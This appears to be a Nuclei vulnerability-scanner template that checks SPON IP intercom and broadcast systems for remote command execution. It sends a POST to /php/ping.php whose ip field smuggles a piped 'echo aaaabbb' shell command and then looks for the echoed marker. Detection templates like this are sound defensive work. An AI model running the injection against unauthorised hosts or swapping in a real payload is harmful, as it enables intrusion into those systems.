id: SPON-IP-rce

info:
  name: SPON IP 网络对讲广播系统 rce
  author: Str1am
  severity: high
  reference: https://poc.shuziguanxing.com/?#/publicIssueInfo#issueId=4578
  tags: SPON,rce

requests:
  - raw:
      - |
        POST /php/ping.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
        
        jsondata[ip]=%7Cecho aaaabbb&jsondata[type]=0

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "aaaabbb"
        part: body
        condition: and